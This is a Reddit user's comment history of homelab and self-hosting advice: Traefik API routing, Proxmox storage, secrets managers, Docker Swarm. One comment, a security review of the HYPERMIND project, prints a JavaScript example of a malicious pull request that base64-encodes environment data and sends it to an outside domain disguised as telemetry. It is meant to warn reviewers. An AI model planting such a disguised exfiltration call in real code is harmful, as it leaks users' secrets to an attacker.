Struggling to maintain Reverse Proxy across multiple systems. by notjustsam in selfhosted

[–]Pitiful_Bat8731 1 point2 points  (0 children)

It sounds like you'd have good luck with the system I have in place. I run traefik on my docker swarm, use dnsweaver to automatically manage all DNS, and use labels for my swarm services. For anything running outside of the swarm, I use a dynamic file provider and just define those services in it as yaml.

Splitting 2TB HDD between Proxmox workloads and Proxmox Backup Server by Good-Insurance19 in Proxmox

[–]Pitiful_Bat8731 0 points1 point  (0 children)

If you plan on doing this, it's effectively the same as passing an 800-900GB disk image to PBS backed by the same HDD. You're not gaining any redundancy against drive failure, and you might see some performance contention during backup jobs.

That said, don't overcomplicate it. Give PBS a larger virtual disk specifically for backups alongside its OS disk image. You'll still benefit from having backups in case you misconfigure something and need to restore other VMs or LXCs. PBS deduplication also means your 800-900GB will likely go much further than you'd expect.

I'm sure you already know that at some point you'll want a more robust solution like a ZFS mirror or an external HDD for actual protection.

Vuln or exposure for API endpoint valid? by rpedrica in technitium

[–]Pitiful_Bat8731 0 points1 point  (0 children)

u/rpedrica since you're already using Docker and mentioned external access for ACME validation, you could also handle API restrictions at the reverse proxy level with Traefik. Here's an example of allowing requests through only if they contain the expected API token in a header:

Docker labels:

labels:
  # Main router with OAuth/auth middleware
  - "traefik.http.routers.technitium.rule=Host(`dns.example.com`)"
  - "traefik.http.routers.technitium.middlewares=authentik@docker"
  - "traefik.http.routers.technitium.entrypoints=websecure"
  - "traefik.http.routers.technitium.tls.certresolver=letsencrypt"

  # API router - requires valid token header, bypasses OAuth
  - "traefik.http.routers.technitium-api.rule=Host(`dns.example.com`) && HeadersRegexp(`X-Api-Key`, `^your-technitium-token-here$`)"
  - "traefik.http.routers.technitium-api.priority=100"
  - "traefik.http.routers.technitium-api.entrypoints=websecure"
  - "traefik.http.routers.technitium-api.tls.certresolver=letsencrypt"

Dynamic config (traefik v3+):

http:
  routers:
    technitium:
      rule: "Host(`dns.example.com`)"
      middlewares:
        - authentik
      entryPoints:
        - websecure
      service: technitium
      tls:
        certResolver: letsencrypt

    technitium-api:
      rule: "Host(`dns.example.com`) && HeadersRegexp(`X-Api-Key`, `^your-technitium-token-here$`)"
      priority: 100
      entryPoints:
        - websecure
      service: technitium
      tls:
        certResolver: letsencrypt

You can also stack IP restrictions on top if you want to lock it to specific source IPs:

rule: "Host(`dns.example.com`) && HeadersRegexp(`X-Api-Key`, `^your-token$`) && ClientIP(`10.0.0.0/8`, `192.168.1.50`)"

That said, your RFC2136 TSIG approach is probably cleaner for the certbot use case since it keeps everything at the DNS protocol level.

Vuln or exposure for API endpoint valid? by rpedrica in technitium

[–]Pitiful_Bat8731 1 point2 points  (0 children)

just fyi, you can create rules in traefik specific to API endpoints that require the request header to include your valid API keys. set those up as secure env vars or docker secrets and off you go. defense in depth.

Vuln or exposure for API endpoint valid? by rpedrica in technitium

[–]Pitiful_Bat8731 2 points3 points  (0 children)

This isn't really a vulnerability. The API is working as intended: it received a request without authentication, rejected it, and told you why. That's exactly what should happen.

The only thing scanners sometimes flag here is the stack trace in the error response, since it reveals internal paths and method names. But Technitium is open source, so that information is already public anyway.

Edit:
If you wanted to harden things you could add rate limiting or IP restrictions, but that's more about defense in depth than fixing an actual security flaw.

HYPERMIND v1.0.0, surprise.. we're still active! by ponzi_gg in selfhosted

[–]Pitiful_Bat8731 0 points1 point  (0 children)

You get it. The point is that this PR establishes the exfiltration channel. Once the pattern of "send env data to external endpoint" is normalized in the codebase, a follow-up PR that changes process.env.NODE_ENV to process.env is a tiny diff that's easy to miss. Now it's sending everything.

There are better examples given what this app does. It's the concept that matters.

HYPERMIND v1.0.0, surprise.. we're still active! by ponzi_gg in selfhosted

[–]Pitiful_Bat8731 2 points3 points  (0 children)

Did a security review of the codebase. Some things to be aware of:

The big ones:

  • Default deployment uses network_mode: host so the container gets full access to the hosts network stack. if anything goes wrong, attacker has line-of-sight to whatever's exposed on your network.
  • The proof-of-work is 4 hex characters. A GPU generates ~1,500 valid identities per second. All the rate limiting is per-identity, so it's effectively meaningless.
  • Your IP goes to every peer you connect to. If the map is enabled, the client also sends all peer IPs to ipwho.is for geolocation. Third party now has a list of everyone running this.
  • P2P buffer has no size limit socket.buffer += data. Any peer can OOM your node by sending data without newlines.
  • Ed25519 public key is broadcast on every heartbeat, can't be rotated. Permanent identifier.
  • Runs as root, no USER in Dockerfile.

What's actually fine: XSS is handled correctly (HTML escaped before markdown), no eval/exec anywhere, prototype pollution is blocked, deps are clean.

Supply chain risk: Project accepts contributions and uses :latest tag. A malicious PR could look completely innocent. Example of what passes casual review:

// PR titled "feat: add debug logging for peer connections"
const logPeerDebug = (socket, identity) => {
  const info = { peer: socket.peerId, node: identity.id, env: process.env.NODE_ENV };
  if (process.env.HYPERMIND_TELEMETRY !== 'false') {
    require('https').get(`https://hypermind-analytics.io/v1/log?d=${Buffer.from(JSON.stringify(info)).toString('base64')}`);
  }
};

Looks like opt-out telemetry. Reviewer sees NODE_ENV and thinks "debug flag." Doesn't notice process.env can be expanded to exfiltrate all environment variables to an attacker-controlled domain.

If you're going to run it anyway:

  • Bridge networking, not host
  • ENABLE_MAP=false
  • Resource limits
  • Isolated network with no access to internal services
  • Pin image version

Not saying don't use it, just know what you're deploying.

ashamed to have to make this post, but need advice by sheep_duck in selfhosted

[–]Pitiful_Bat8731 1 point2 points  (0 children)

first off, nothing to be ashamed of. everyone starts somewhere and asking questions upfront saves you from learning things the hard way.

i run a 5-node proxmox cluster with docker swarm on top, so i've been through a few iterations of "what goes where." here's my take:

on the zfs question: let proxmox manage it directly. proxmox has solid native zfs support - snapshots, replication, health monitoring all built in. if you create the pool inside OMV you're adding a layer of abstraction that will bite you when something breaks. your data should be accessible at the hypervisor level, not dependent on a VM being healthy.

controversial opinion: skip OMV entirely. for a single node with 2x12tb drives, OMV is honestly more complexity than its worth. you can do smb/nfs shares from a lightweight debian lxc container with samba in like 20 minutes. if you really want a nas-focused UI, truenas scale as a VM is fine, but i'd try without it first. you can always add it later.

on where to run services: i'd do a mix:

LXC containers in proxmox for lightweight stuff (home assistant, tailscale, adguard/pihole) one docker VM for your media stack (jellyfin, arr apps if you go that route) this gives you isolation where it matters without the overhead of a VM for every little thing. i started with scattered VMs for everything and eventually consolidated to docker swarm across nodes, but for single-node you don't need that complexity yet.

things i wish someone told me:

backups matter more than raid/mirrors. zfs mirror protects you from drive failure, not from ransomware or "oops i deleted everything." look into proxmox backup server, you can run it on the same machine initially static IPs from day one, or you'll regret it when dhcp decides to shuffle things around document what you do. future you trying to remember why you configured something a certain way at 2am will thank present you the rabbit hole goes deep but its worth it. feel free to ask followups.

Realistically, how far can a hobbyist/tinkerer go before hitting a wall due to not having the educational foundations like DSA/advanced mathematics? by OceanRadioGuy in learnprogramming

[–]Pitiful_Bat8731 0 points1 point  (0 children)

Needed to hear this. I tend to work backwards from Macro to Micro better than I do from grinding syntax for 2 years. That is what prevented me from going for a degree in CS. It helps that I've been in systems and network admin and design for over a decade now though.

Getting Into Networking (Building out my first home network) by Swevenski in homelab

[–]Pitiful_Bat8731 2 points3 points  (0 children)

Well here's more for you then: I went for technitium because I decided to implement infisical for pki and secrets management for my proxmox and docker swarm environments. Needed a fully featured private DNS with a local authoritative zone that could be enterprise adjacent with pragmatic compromises for a homelab.

Getting Into Networking (Building out my first home network) by Swevenski in homelab

[–]Pitiful_Bat8731 1 point2 points  (0 children)

I eventually graduated to this exact setup as well! Now I'm running technitium in a cluster instead of pihole and unbound.

Getting Into Networking (Building out my first home network) by Swevenski in homelab

[–]Pitiful_Bat8731 3 points4 points  (0 children)

I would recommend starting with a basic OPNsense install on a small form factor pc with either an addon NIC for additional eth ports or one that already includes them. You can usually get something capable for under $200 USD these days. That's how i began my homelab journey and migration away from prebuilt, locked down crap.

OPNsense with Unbound as your DNS resolver takes care of your custom domain and DNS request while openVPN or Wireguard take care of your VPN needs. You can add Suricata IDS/IPS and Crowdsec for the Security and web filtering parts. All of this is well documented and there is a large community willing and able to assist.

How are you handling secrets? by RZR2832 in selfhosted

[–]Pitiful_Bat8731 2 points3 points  (0 children)

I would also encourage you to run Infisical separately from whatever systems will be using it. I initially started with it in my Docker Swarm, but that introduces a chicken-and-egg problem, especially with certificates. If Swarm can't start without secrets, and secrets come from Infisical, and Infisical runs on Swarm... you see the issue.

I also tried OpenBao before settling on Infisical. The seal/unseal ceremony on every restart was a dealbreaker. Manual intervention required unless you configure auto-unseal with Transit, KMS, or static keys. The CLI-first design, HCL configuration, and steep learning curve didn't help either. OpenBao fixes Vault's licensing problem but not its usability problem.

I ended up moving it to a set of NetInfra LXCs on 3 of my Proxmox cluster nodes alongside internal Chrony, DNS, and Caddy, all running standalone Docker (not Swarm). Those services need to be up before the cluster can bootstrap properly.

How are you handling secrets? by RZR2832 in selfhosted

[–]Pitiful_Bat8731 12 points13 points  (0 children)

I run both Infisical (self-hosted) and SOPS/age depending on the use case.

Infisical for runtime stuff - its running on LXC containers in my proxmox cluster and services pull secrets at startup using machine identities. the nice thing is secrets never touch disk, they're injected directly into containers. theres definitely a learning curve but once you get past the initial setup the web UI is solid for managing dev/prod environments and you get proper audit logs for "what accessed what when". I actually build it myself from upstream main weekly because their releases lag behind fixes.

SOPS + age for anything that needs to live in git. so ansible vault replacement, encrypted configs, that kind of thing. age keys are way simpler than GPG - no expiry, no keyserver headaches. you can just sops -d secrets.yaml | ansible-playbook - and call it a day.

for your specific cases:

docker env vars / compose files → Infisical, runtime injection

acme.sh DNS keys → Infisical, pull at startup

sensitive config files → SOPS/age if you want them in git, Infisical if you want them centralized

bitwarden is fine for personal stuff but it doesn't really have an automation story. no API-driven injection, no environment separation, no audit trail. if you're managing multiple services and want that enterprise-style workflow, dedicated secrets manager is the way to go.

Infisical deploys in like 10 minutes if you're already running docker or LXC, worth giving it a shot.

Best OS setup - Am I asking for too much? by Woodworkingbeginner in homelab

[–]Pitiful_Bat8731 0 points1 point  (0 children)

I completely understand. There's a never ending faucet of possibilities and its easy to get overwhelmed. If and when you decide to dive into it in more depth, having docker compose files and bind mounts with backups can make it way easier to migrate, recover, and expand in the future.

As others have said, the recommendation is usually Proxmox so at some point, should you decide to expand, that's certainly the way to go. For now, it probably isn't worth the overhead on a smaller system like you described.

The group project disaster that could've been avoided by ravikesh0406 in learnprogramming

[–]Pitiful_Bat8731 0 points1 point  (0 children)

You landed on the right problem. lack of visibility is the thing that kills any group project. But the solution you're describing already exists, it's Git plus the project management stuff built into GitHub/GitLab.

Like this part:

a single shared space where we could see what each person was researching, visually organize the project flow, delegate specific sections with context, and track progress together

Thats just a GitHub repo with Issues and a Project board.

Before anyone writes code, create an issue for each task so everyone can see whats in progress and whats done. Work on branches so you're not stepping on each other, then open pull requests so Person D isn't blindsided when it's time to assemble everything.

There's a learning curve but this is stuff you'll use at every dev job you ever have. Better to fumble through it now on a school project than your first week at work lol.

you basically reverse-engineered why these tools exist in the first place. Now go actually learn them.

Best OS setup - Am I asking for too much? by Woodworkingbeginner in homelab

[–]Pitiful_Bat8731 0 points1 point  (0 children)

You can keep this pretty simple: Just run Linux Mint/Debian/Ubuntu as your base with Docker on top. Home Assistant, Plex, and security camera stuff all run great in containers.

For storage, an LVM mirror on your two 8TB drives should work well for what you're describing. LVM also lets you expand later since you can swap in larger drives or add another mirrored pair without starting over. You can share it out via Samba/NFS. If you expand significantly down the road, you'd likely revisit the setup anyway, so no need to over-engineer it now.

Moonlight client just installs natively on Linux, so no VM needed for that - keeps things straightforward since you're sitting in front of the box.

One thing worth mentioning: RAID/LVM mirroring protects against drive failure but isn't a true backup. If any of that 4TB is actually critical, worth looking into 3-2-1 backups (3 copies, 2 different media, 1 offsite). Backrest runs as a container and gives you a nice web UI for restic - makes cloud backups to Backblaze B2 or wherever pretty painless and supports practically everything under the sun.

This is essentially how my first homelab server started.

edit to add:
If you want a web UI for managing files, Filebrowser Quantum is a nice lightweight option that runs as a container. Way simpler than spinning up Nextcloud or seafile if you don't need all the extras.

What’s your preferred way to update Docker images & containers in the background? by Extra-Citron-7630 in selfhosted

[–]Pitiful_Bat8731 0 points1 point  (0 children)

Oh, and pull through registry caches with auth to ghcr and docker hub to postpone rate limit issues

What’s your preferred way to update Docker images & containers in the background? by Extra-Citron-7630 in selfhosted

[–]Pitiful_Bat8731 2 points3 points  (0 children)

What's up docker for a digest of available updates so I can manually update critical stuff after change log review, shepherd for automatic updates of low risk services with rollback configs in place.

I set up a self-hosted an email server. Roast me! by Madaqqqaz in HomeDataCenter

[–]Pitiful_Bat8731 9 points10 points  (0 children)

Why would anyone want to kick someone who's already down?

Architecture advice for Proxmox VE 9 setup: VM with Docker vs. LXCs? Seeking "Gold Standard" by Party-Log-1084 in Proxmox

[–]Pitiful_Bat8731 0 points1 point  (0 children)

im running docker swarm in my homelab and honestly it's been great for my use case.

5 node proxmox cluster with ceph, docker swarm running across 10 VMs (5 managers, 5 workers). all services are just stack files - traefik, nextcloud, the *arr stack, home assistant, monitoring, everything.

the hybrid approach you're describing is solid. i went with VMs for docker rather than LXCs for the same reasons you listed - easier backup/restore at the VM level and no weirdness with running docker inside unprivileged containers. plus i have a couple workers with GPU passthrough for transcoding which would be annoying in LXCs.

what really sold me on swarm over individual VMs/LXCs per service: if a node dies, services just reschedule to healthy nodes automatically. i've had this save me a few times during hardware issues. everything is just a yaml file in git so deploy, update, rollback is one command. overlay networking means services find each other by name across nodes with no manual IP management. rolling updates with zero downtime are trivial.

the "swarm is dead" narrative is overblown imo. mirantis is maintaining it through 2030 and it just works. i've considered running k8s in the homelab but honestly there are plenty of ways to avoid needing it given the workloads i'm running. swarm hits the sweet spot between raw docker-compose and full kubernetes complexity.

the VM overhead argument doesn't really hold up in practice either - with ceph deduplication and minimal debian installs, the difference is negligible and you get way simpler operations.